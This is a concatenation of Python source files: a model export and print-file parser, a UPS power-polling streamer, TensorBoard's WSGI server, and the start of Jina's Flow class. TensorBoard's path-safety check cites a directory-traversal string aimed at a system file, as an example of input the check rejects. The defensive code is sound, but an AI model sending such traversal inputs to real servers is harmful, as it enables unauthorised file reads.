net.init_parameters_data()
if file_format == 'GEIR':
phase_name = 'export.geir'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name)
_executor.export(file_name, graph_id)
elif file_format == 'ONNX': # file_format is 'ONNX'
        # NOTICE: the phase name `export_onnx` is used for judging whether it is exporting onnx in the compile pipeline,
# do not change it to other values.
phase_name = 'export.onnx'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id)
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
elif file_format == 'BINARY': # file_format is 'BINARY'
phase_name = 'export.binary'
graph_id, _ = _executor.compile(net, *inputs, phase=phase_name, do_convert=False)
onnx_stream = _executor._get_func_graph_proto(graph_id, 'binary_ir')
with open(file_name, 'wb') as f:
os.chmod(file_name, stat.S_IWUSR | stat.S_IRUSR)
f.write(onnx_stream)
# restore network training mode
if is_training:
net.set_train(mode=True)
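# Illustrative sketch (not part of the original module): export a network to ONNX.
# `net` and `input_tensor` are hypothetical; the tensor must match the network's
# expected input shape and dtype.
def _example_export(net, input_tensor):
    export(net, input_tensor, file_name="example_model.onnx", file_format='ONNX')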
def parse_print(print_file_name):
"""
Loads Print data from a specified file.
Args:
        print_file_name (str): The file name of the saved print data.
Returns:
List, element of list is Tensor.
Raises:
        ValueError: The print file may be empty, please make sure you entered the correct file name.
"""
print_file_path = os.path.realpath(print_file_name)
if os.path.getsize(print_file_path) == 0:
raise ValueError("The print file may be empty, please make sure enter the correct file name.")
logger.info("Execute load print process.")
print_list = Print()
try:
with open(print_file_path, "rb") as f:
pb_content = f.read()
print_list.ParseFromString(pb_content)
except BaseException as e:
logger.error("Failed to read the print file %s, please check the correct of the file.", print_file_name)
raise ValueError(e.__str__())
tensor_list = []
try:
for print_ in print_list.value:
# String type
if print_.HasField("desc"):
tensor_list.append(print_.desc)
elif print_.HasField("tensor"):
dims = print_.tensor.dims
data_type = print_.tensor.tensor_type
data = print_.tensor.tensor_content
np_type = tensor_to_np_type[data_type]
                param_data = np.frombuffer(data, np_type)
ms_type = tensor_to_ms_type[data_type]
param_dim = []
for dim in dims:
param_dim.append(dim)
if param_dim:
param_value = param_data.reshape(param_dim)
tensor_list.append(Tensor(param_value, ms_type))
                # Scalar type
else:
data_type_ = data_type.lower()
if 'float' in data_type_:
param_data = float(param_data[0])
elif 'int' in data_type_:
param_data = int(param_data[0])
elif 'bool' in data_type_:
param_data = bool(param_data[0])
tensor_list.append(Tensor(param_data, ms_type))
except BaseException as e:
logger.error("Failed to load the print file %s.", print_list)
raise RuntimeError(e.__str__())
return tensor_list
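# Illustrative sketch (not part of the original module): read back the values written
# by a Print operator. The dump file name below is a hypothetical placeholder.
def _example_parse_print(print_file_name="print_output.data"):
    for item in parse_print(print_file_name):
        print(type(item), item)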
|
data_streamer.py
|
__author__ = "Your name"
__email__ = "Your email"
__version__ = "0.1"
import json
from datetime import datetime
from threading import Thread
import time
import subprocess
import requests
class DataStreamer(object):
"""
Docstring here
"""
def __init__(self, message_queue):
"""
:param self:
"""
self.message_queue = message_queue
self.running = True
self.thread = Thread(target=self._start_data_poll).start()
pass
def _start_data_poll(self):
"""
:return:
"""
url = "http://db.sead.systems:8080/466419818?limit=61&device=Panel3&type=P"
prev_time = int(time.time())
        while self.running:
"""
response = requests.get(url)
json_data = json.loads(response.text)
for i in range(2,61):
previous_data_point = json_data[i-1]
current_data_point = json_data[i]
delta = (float(current_data_point[1]) - float(previous_data_point[1])) / (3600.0 * 1.0);
datetime_object = datetime.strptime(current_data_point[0], '%Y-%m-%d %H:%M:%S')
self.message_queue.put((delta, datetime_object))
sleep(60)
# for i in range(5):
# self.message_queue.put((time(), "{}kWh".format(randint(0, 5000)/1000.0)))
"""
cur_time = int(time.time())
if cur_time == prev_time:
continue
prev_time = cur_time
cur_time_str = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(cur_time))
datetime_object = datetime.strptime(cur_time_str, '%Y-%m-%d %H:%M:%S')
            # Parse what appears to be the UPS load percentage from `apcaccess` output
            # (13th line, value before its unit) and scale it by an assumed 510 W capacity.
            delta = 510.0*0.01*float(subprocess.check_output(["apcaccess"]).decode().split("\n")[12].split(":")[1].strip().split(" ")[0])
self.message_queue.put((delta, datetime_object))
time.sleep(1)
def finish(self):
print("Done")
self.running = False
self.thread.join()
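# Illustrative sketch (not part of the original module): consume the streamer's queue
# for a few seconds, assuming a standard queue.Queue is used as message_queue and the
# `apcaccess` binary polled above is available on the host.
def _example_stream(seconds=5):
    import queue
    message_queue = queue.Queue()
    streamer = DataStreamer(message_queue)
    time.sleep(seconds)
    streamer.finish()
    while not message_queue.empty():
        delta, stamp = message_queue.get()
        print(stamp, delta)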
|
application.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""TensorBoard WSGI Application Logic.
TensorBoardApplication constructs TensorBoard as a WSGI application.
It handles serving static assets, and implements TensorBoard data APIs.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import imghdr
import mimetypes
import os
import re
import threading
import time
import six
from six.moves import urllib
from six.moves.urllib import parse as urlparse
from werkzeug import wrappers
from tensorflow.python.platform import resource_loader
from tensorflow.python.platform import tf_logging as logging
from tensorflow.tensorboard.backend import process_graph
from tensorflow.tensorboard.backend.event_processing import event_accumulator
from tensorflow.tensorboard.backend.event_processing import event_multiplexer
from tensorflow.tensorboard.lib.python import http_util
from tensorflow.tensorboard.plugins.debugger import debugger_plugin
from tensorflow.tensorboard.plugins.projector import projector_plugin
DEFAULT_SIZE_GUIDANCE = {
event_accumulator.COMPRESSED_HISTOGRAMS: 500,
event_accumulator.IMAGES: 10,
event_accumulator.AUDIO: 10,
event_accumulator.SCALARS: 1000,
event_accumulator.HEALTH_PILLS: 100,
event_accumulator.HISTOGRAMS: 50,
}
DATA_PREFIX = '/data'
LOGDIR_ROUTE = '/logdir'
RUNS_ROUTE = '/runs'
PLUGIN_PREFIX = '/plugin'
SCALARS_ROUTE = '/' + event_accumulator.SCALARS
IMAGES_ROUTE = '/' + event_accumulator.IMAGES
AUDIO_ROUTE = '/' + event_accumulator.AUDIO
HISTOGRAMS_ROUTE = '/' + event_accumulator.HISTOGRAMS
COMPRESSED_HISTOGRAMS_ROUTE = '/' + event_accumulator.COMPRESSED_HISTOGRAMS
INDIVIDUAL_IMAGE_ROUTE = '/individualImage'
INDIVIDUAL_AUDIO_ROUTE = '/individualAudio'
GRAPH_ROUTE = '/' + event_accumulator.GRAPH
RUN_METADATA_ROUTE = '/' + event_accumulator.RUN_METADATA
TAB_ROUTES = ['', '/events', '/images', '/audio', '/graphs', '/histograms']
_IMGHDR_TO_MIMETYPE = {
'bmp': 'image/bmp',
'gif': 'image/gif',
'jpeg': 'image/jpeg',
'png': 'image/png'
}
_DEFAULT_IMAGE_MIMETYPE = 'application/octet-stream'
def _content_type_for_image(encoded_image_string):
image_type = imghdr.what(None, encoded_image_string)
return _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
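# Illustrative sketch (not part of the original module): guess the MIME type of an
# encoded image read from disk. The path below is a hypothetical placeholder.
def _example_content_type(path='/tmp/example.png'):
  with open(path, 'rb') as f:
    print(_content_type_for_image(f.read()))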
class _OutputFormat(object):
"""An enum used to list the valid output formats for API calls.
Not all API calls support all formats (for example, only scalars and
compressed histograms support CSV).
"""
JSON = 'json'
def standard_tensorboard_wsgi(logdir, purge_orphaned_data, reload_interval):
"""Construct a TensorBoardWSGIApp with standard plugins and multiplexer."""
multiplexer = event_multiplexer.EventMultiplexer(
size_guidance=DEFAULT_SIZE_GUIDANCE,
purge_orphaned_data=purge_orphaned_data)
plugins = {
debugger_plugin.PLUGIN_PREFIX_ROUTE:
debugger_plugin.DebuggerPlugin(multiplexer),
projector_plugin.PLUGIN_PREFIX_ROUTE:
projector_plugin.ProjectorPlugin(),
}
return TensorBoardWSGIApp(logdir, plugins, multiplexer, reload_interval)
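# Illustrative sketch (not part of the original module): serve the WSGI app with the
# standard library's wsgiref server. The logdir path below is a hypothetical placeholder.
def _example_run_tensorboard(logdir='/tmp/tb_logdir', port=6006):
  from wsgiref import simple_server
  app = standard_tensorboard_wsgi(logdir, purge_orphaned_data=True, reload_interval=60)
  httpd = simple_server.make_server('localhost', port, app)
  httpd.serve_forever()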
class TensorBoardWSGIApp(object):
"""The TensorBoard application, conforming to WSGI spec."""
# How many samples to include in sampling API calls by default.
DEFAULT_SAMPLE_COUNT = 10
# NOTE TO MAINTAINERS: An accurate Content-Length MUST be specified on all
# responses using send_header.
protocol_version = 'HTTP/1.1'
def __init__(self, logdir, plugins, multiplexer, reload_interval):
"""Constructs the TensorBoard application.
Args:
logdir: the logdir spec that describes where data will be loaded.
        May be a directory, or a comma-separated list of directories, or colons
        can be used to provide named directories.
plugins: Map from plugin name to plugin application
multiplexer: The EventMultiplexer with TensorBoard data to serve
reload_interval: How often (in seconds) to reload the Multiplexer
Returns:
A WSGI application that implements the TensorBoard backend.
"""
self._logdir = logdir
self._plugins = plugins
self._multiplexer = multiplexer
self.tag = get_tensorboard_tag()
path_to_run = parse_event_files_spec(self._logdir)
if reload_interval:
start_reloading_multiplexer(self._multiplexer, path_to_run,
reload_interval)
else:
reload_multiplexer(self._multiplexer, path_to_run)
self.data_applications = {
DATA_PREFIX + LOGDIR_ROUTE:
self._serve_logdir,
DATA_PREFIX + SCALARS_ROUTE:
self._serve_scalars,
DATA_PREFIX + GRAPH_ROUTE:
self._serve_graph,
DATA_PREFIX + RUN_METADATA_ROUTE:
self._serve_run_metadata,
DATA_PREFIX + HISTOGRAMS_ROUTE:
self._serve_histograms,
DATA_PREFIX + COMPRESSED_HISTOGRAMS_ROUTE:
self._serve_compressed_histograms,
DATA_PREFIX + IMAGES_ROUTE:
self._serve_images,
DATA_PREFIX + INDIVIDUAL_IMAGE_ROUTE:
self._serve_image,
DATA_PREFIX + AUDIO_ROUTE:
self._serve_audio,
DATA_PREFIX + INDIVIDUAL_AUDIO_ROUTE:
self._serve_individual_audio,
DATA_PREFIX + RUNS_ROUTE:
self._serve_runs,
'/app.js':
self._serve_js
}
# Serve the routes from the registered plugins using their name as the route
# prefix. For example if plugin z has two routes /a and /b, they will be
# served as /data/plugin/z/a and /data/plugin/z/b.
for name in self._plugins:
try:
plugin = self._plugins[name]
plugin_apps = plugin.get_plugin_apps(self._multiplexer.RunPaths(),
self._logdir)
except Exception as e: # pylint: disable=broad-except
logging.warning('Plugin %s failed. Exception: %s', name, str(e))
continue
for route, app in plugin_apps.items():
path = DATA_PREFIX + PLUGIN_PREFIX + '/' + name + route
self.data_applications[path] = app
# We use underscore_names for consistency with inherited methods.
def _image_response_for_run(self, run_images, run, tag):
"""Builds a JSON-serializable object with information about run_images.
Args:
run_images: A list of event_accumulator.ImageValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, width, and
height for each image.
"""
response = []
for index, run_image in enumerate(run_images):
response.append({
'wall_time': run_image.wall_time,
'step': run_image.step,
# We include the size so that the frontend can add that to the <img>
# tag so that the page layout doesn't change when the image loads.
'width': run_image.width,
'height': run_image.height,
'query': self._query_for_individual_image(run, tag, index)
})
return response
def _audio_response_for_run(self, run_audio, run, tag):
"""Builds a JSON-serializable object with information about run_audio.
Args:
run_audio: A list of event_accumulator.AudioValueEvent objects.
run: The name of the run.
tag: The name of the tag the images all belong to.
Returns:
A list of dictionaries containing the wall time, step, URL, and
content_type for each audio clip.
"""
response = []
for index, run_audio_clip in enumerate(run_audio):
response.append({
'wall_time': run_audio_clip.wall_time,
'step': run_audio_clip.step,
'content_type': run_audio_clip.content_type,
'query': self._query_for_individual_audio(run, tag, index)
})
return response
def _path_is_safe(self, path):
"""Check path is safe (stays within current directory).
This is for preventing directory-traversal attacks.
Args:
path: The path to check for safety.
Returns:
True if the given path stays within the current directory, and false
if it would escape to a higher directory. E.g. _path_is_safe('index.html')
returns true, but _path_is_safe('../../../etc/password') returns false.
"""
base = os.path.abspath(os.curdir)
absolute_path = os.path.abspath(path)
prefix = os.path.commonprefix([base, absolute_path])
return prefix == base
@wrappers.Request.application
def _serve_logdir(self, request):
"""Respond with a JSON object containing this TensorBoard's logdir."""
return http_util.Respond(
request, {'logdir': self._logdir}, 'application/json')
@wrappers.Request.application
def _serve_scalars(self, request):
"""Given a tag and single run, return array of ScalarEvents."""
# TODO(cassandrax): return HTTP status code for malformed requests
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Scalars(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_graph(self, request):
"""Given a single run, return the graph definition in json format."""
run = request.args.get('run', None)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
graph = self._multiplexer.Graph(run)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
limit_attr_size = request.args.get('limit_attr_size', None)
if limit_attr_size is not None:
try:
limit_attr_size = int(limit_attr_size)
except ValueError:
return http_util.Respond(
request, 'query parameter `limit_attr_size` must be integer',
'text/plain', 400)
large_attrs_key = request.args.get('large_attrs_key', None)
try:
process_graph.prepare_graph_for_ui(graph, limit_attr_size,
large_attrs_key)
except ValueError as e:
      return http_util.Respond(request, str(e), 'text/plain', 400)
return http_util.Respond(request, str(graph), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_run_metadata(self, request):
"""Given a tag and a TensorFlow run, return the session.run() metadata."""
tag = request.args.get('tag', None)
run = request.args.get('run', None)
if tag is None:
return http_util.Respond(
request, 'query parameter "tag" is required', 'text/plain', 400)
if run is None:
return http_util.Respond(
request, 'query parameter "run" is required', 'text/plain', 400)
try:
run_metadata = self._multiplexer.RunMetadata(run, tag)
except ValueError:
return http_util.Respond(request, '404 Not Found', code=404)
return http_util.Respond(
request, str(run_metadata), 'text/x-protobuf') # pbtxt
@wrappers.Request.application
def _serve_histograms(self, request):
"""Given a tag and single run, return an array of histogram values."""
tag = request.args.get('tag')
run = request.args.get('run')
values = self._multiplexer.Histograms(run, tag)
return http_util.Respond(request, values, 'application/json')
@wrappers.Request.application
def _serve_compressed_histograms(self, request):
"""Given a tag and single run, return an array of compressed histograms."""
tag = request.args.get('tag')
run = request.args.get('run')
compressed_histograms = self._multiplexer.CompressedHistograms(run, tag)
return http_util.Respond(request, compressed_histograms, 'application/json')
@wrappers.Request.application
def _serve_images(self, request):
"""Given a tag and list of runs, serve a list of images.
Note that the images themselves are not sent; instead, we respond with URLs
to the images. The frontend should treat these URLs as opaque and should not
try to parse information about them or generate them itself, as the format
may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
images = self._multiplexer.Images(run, tag)
response = self._image_response_for_run(images, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_image(self, request):
"""Serves an individual image."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
image = self._multiplexer.Images(run, tag)[index]
encoded_image_string = image.encoded_image_string
content_type = _content_type_for_image(encoded_image_string)
return http_util.Respond(request, encoded_image_string, content_type)
def _query_for_individual_image(self, run, tag, index):
"""Builds a URL for accessing the specified image.
This should be kept in sync with _serve_image. Note that the URL is *not*
guaranteed to always return the same image, since images may be unloaded
from the reservoir as new images come in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the image. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled image in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_audio(self, request):
"""Given a tag and list of runs, serve a list of audio.
Note that the audio clips themselves are not sent; instead, we respond with
URLs to the audio. The frontend should treat these URLs as opaque and should
not try to parse information about them or generate them itself, as the
format may change.
Args:
request: A werkzeug.wrappers.Request object.
Returns:
A werkzeug.Response application.
"""
tag = request.args.get('tag')
run = request.args.get('run')
audio_list = self._multiplexer.Audio(run, tag)
response = self._audio_response_for_run(audio_list, run, tag)
return http_util.Respond(request, response, 'application/json')
@wrappers.Request.application
def _serve_individual_audio(self, request):
"""Serves an individual audio clip."""
tag = request.args.get('tag')
run = request.args.get('run')
index = int(request.args.get('index'))
audio = self._multiplexer.Audio(run, tag)[index]
return http_util.Respond(
request, audio.encoded_audio_string, audio.content_type)
def _query_for_individual_audio(self, run, tag, index):
"""Builds a URL for accessing the specified audio.
This should be kept in sync with _serve_individual_audio. Note that the URL
is *not* guaranteed to always return the same audio, since audio may be
unloaded from the reservoir as new audio comes in.
Args:
run: The name of the run.
tag: The tag.
index: The index of the audio. Negative values are OK.
Returns:
A string representation of a URL that will load the index-th
sampled audio in the given run with the given tag.
"""
query_string = urllib.parse.urlencode({
'run': run,
'tag': tag,
'index': index
})
return query_string
@wrappers.Request.application
def _serve_runs(self, request):
"""WSGI app serving a JSON object about runs and tags.
Returns a mapping from runs to tagType to list of tags for that run.
Args:
request: A werkzeug request
Returns:
A werkzeug Response with the following content:
{runName: {images: [tag1, tag2, tag3],
audio: [tag4, tag5, tag6],
scalars: [tagA, tagB, tagC],
histograms: [tagX, tagY, tagZ],
firstEventTimestamp: 123456.789}}
"""
runs = self._multiplexer.Runs()
for run_name, run_data in runs.items():
try:
run_data['firstEventTimestamp'] = self._multiplexer.FirstEventTimestamp(
run_name)
except ValueError:
logging.warning('Unable to get first event timestamp for run %s',
run_name)
run_data['firstEventTimestamp'] = None
return http_util.Respond(request, runs, 'application/json')
@wrappers.Request.application
def _serve_index(self, request):
"""Serves the index page (i.e., the tensorboard app itself)."""
return self._serve_static_file(request, '/dist/index.html')
@wrappers.Request.application
def _serve_js(self, request):
"""Serves the JavaScript for the index page."""
return self._serve_static_file(request, '/dist/app.js')
def _serve_static_file(self, request, path):
"""Serves the static file located at the given path.
Args:
request: A werkzeug Request
path: The path of the static file, relative to the tensorboard/ directory.
Returns:
A werkzeug.Response application.
"""
# Strip off the leading forward slash.
orig_path = path.lstrip('/')
if not self._path_is_safe(orig_path):
logging.warning('path not safe: %s', orig_path)
return http_util.Respond(request, 'Naughty naughty!', 'text/plain', 400)
# Resource loader wants a path relative to //WORKSPACE/tensorflow.
path = os.path.join('tensorboard', orig_path)
# Open the file and read it.
try:
contents = resource_loader.load_resource(path)
except IOError:
# For compatibility with latest version of Bazel, we renamed bower
# packages to use '_' rather than '-' in their package name.
# This means that the directory structure is changed too.
# So that all our recursive imports work, we need to modify incoming
# requests to map onto the new directory structure.
path = orig_path
components = path.split('/')
components[0] = components[0].replace('-', '_')
path = ('/').join(components)
# Bazel keeps all the external dependencies in //WORKSPACE/external.
# and resource loader wants a path relative to //WORKSPACE/tensorflow/.
path = os.path.join('../external', path)
try:
contents = resource_loader.load_resource(path)
except IOError:
logging.warning('path %s not found, sending 404', path)
return http_util.Respond(request, 'Not found', 'text/plain', code=404)
mimetype, content_encoding = mimetypes.guess_type(path)
mimetype = mimetype or 'application/octet-stream'
return http_util.Respond(
request,
contents,
mimetype,
expires=3600,
content_encoding=content_encoding)
def __call__(self, environ, start_response): # pylint: disable=invalid-name
"""Central entry point for the TensorBoard application.
This method handles routing to sub-applications. It does simple routing
using regular expression matching.
This __call__ method conforms to the WSGI spec, so that instances of this
class are WSGI applications.
Args:
environ: See WSGI spec.
start_response: See WSGI spec.
Returns:
A werkzeug Response.
"""
request = wrappers.Request(environ)
parsed_url = urlparse.urlparse(request.path)
# Remove a trailing slash, if present.
clean_path = parsed_url.path
if clean_path.endswith('/'):
clean_path = clean_path[:-1]
# pylint: disable=too-many-function-args
if clean_path in self.data_applications:
return self.data_applications[clean_path](environ, start_response)
elif clean_path in TAB_ROUTES:
return self._serve_index(environ, start_response)
else:
return self._serve_static_file(request, clean_path)(environ,
start_response)
# pylint: enable=too-many-function-args
def parse_event_files_spec(logdir):
"""Parses `logdir` into a map from paths to run group names.
The events files flag format is a comma-separated list of path specifications.
A path specification either looks like 'group_name:/path/to/directory' or
'/path/to/directory'; in the latter case, the group is unnamed. Group names
cannot start with a forward slash: /foo:bar/baz will be interpreted as a
spec with no name and path '/foo:bar/baz'.
Globs are not supported.
Args:
logdir: A comma-separated list of run specifications.
Returns:
A dict mapping directory paths to names like {'/path/to/directory': 'name'}.
Groups without an explicit name are named after their path. If logdir is
None, returns an empty dict, which is helpful for testing things that don't
require any valid runs.
"""
files = {}
if logdir is None:
return files
# Make sure keeping consistent with ParseURI in core/lib/io/path.cc
uri_pattern = re.compile('[a-zA-Z][0-9a-zA-Z.]*://.*')
for specification in logdir.split(','):
    # Check if the spec contains a group. A spec starting with xyz:// is regarded as a
    # URI path spec instead of a group spec. If the spec looks like /foo:bar/baz,
# then we assume it's a path with a colon.
if (uri_pattern.match(specification) is None and ':' in specification and
specification[0] != '/'):
# We split at most once so run_name:/path:with/a/colon will work.
run_name, _, path = specification.partition(':')
else:
run_name = None
path = specification
if uri_pattern.match(path) is None:
path = os.path.realpath(path)
files[path] = run_name
return files
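# Illustrative sketch (not part of the original module): how logdir specs map to the
# returned {path: run_name} dict. The paths are hypothetical, and os.path.realpath may
# rewrite them on systems where /tmp is a symlink.
def _example_parse_specs():
  print(parse_event_files_spec('train:/tmp/a,eval:/tmp/b'))  # {'/tmp/a': 'train', '/tmp/b': 'eval'}
  print(parse_event_files_spec('gs://bucket/logs'))          # {'gs://bucket/logs': None}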
def reload_multiplexer(multiplexer, path_to_run):
"""Loads all runs into the multiplexer.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
"""
start = time.time()
logging.info('TensorBoard reload process beginning')
for (path, name) in six.iteritems(path_to_run):
multiplexer.AddRunsFromDirectory(path, name)
logging.info('TensorBoard reload process: Reload the whole Multiplexer')
multiplexer.Reload()
duration = time.time() - start
logging.info('TensorBoard done reloading. Load took %0.3f secs', duration)
def start_reloading_multiplexer(multiplexer, path_to_run, load_interval):
"""Starts a thread to automatically reload the given multiplexer.
The thread will reload the multiplexer by calling `ReloadMultiplexer` every
`load_interval` seconds, starting immediately.
Args:
multiplexer: The `EventMultiplexer` to add runs to and reload.
path_to_run: A dict mapping from paths to run names, where `None` as the run
name is interpreted as a run name equal to the path.
load_interval: How many seconds to wait after one load before starting the
next load.
Returns:
A started `threading.Thread` that reloads the multiplexer.
"""
# We don't call multiplexer.Reload() here because that would make
# AddRunsFromDirectory block until the runs have all loaded.
def _reload_forever():
while True:
reload_multiplexer(multiplexer, path_to_run)
time.sleep(load_interval)
thread = threading.Thread(target=_reload_forever)
thread.daemon = True
thread.start()
return thread
def get_tensorboard_tag():
"""Read the TensorBoard TAG number, and return it or an empty string."""
tag = resource_loader.load_resource('tensorboard/TAG').strip()
return tag
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
import warnings
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
TYPE_CHECKING,
Dict,
List,
Optional,
Set,
Tuple,
Type,
Union,
overload,
)
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
DeploymentRoleType,
FlowBuildLevel,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import (
FlowMissingDeploymentError,
FlowTopologyError,
RuntimeFailToStart,
)
from jina.helper import (
ArgNamespace,
CatchAllCleanupContextManager,
colored,
download_mermaid_url,
get_internal_ip,
get_public_ip,
typename,
docarray_graphql_compatible,
GRAPHQL_MIN_DOCARRAY_VERSION,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.orchestrate.deployments import Deployment
from jina.orchestrate.flow.builder import _hanging_deployments, allowed_levels
from jina.parsers import (
set_client_cli_parser,
set_deployment_parser,
set_gateway_parser,
)
from jina.parsers.flow import set_flow_parser
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
from jina.serve.executors import BaseExecutor
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_deployment_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors."""
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
return_responses: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param return_responses: If set, return results as List of Requests instead of a reduced DocArray.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
deployments_addresses: Optional[str] = '{}',
description: Optional[str] = None,
disable_reduce: Optional[bool] = False,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
no_graphql_endpoint: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
        :param daemon: The Pod attempts to terminate all of its Runtime child processes/threads on exiting. Setting it to true basically tells the Pod not to wait on the Runtime when closing.
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param deployments_addresses: dictionary JSON with the input addresses of each Deployment
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param disable_reduce: Disable the built-in reduce mechanism, set this if the reduction is to be handled by the Executor connected to this Head
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
        :param native: If set, only native Executors are allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param no_graphql_endpoint: If set, /graphql endpoint is removed from HTTP interface.
:param polling: The polling strategy of the Deployment and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Deployment or by endpoint.
Define per Deployment:
- ANY: only one (whoever is idle) Pod polls the message
- ALL: all Pods poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port: The port for input data to bind to, default is a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
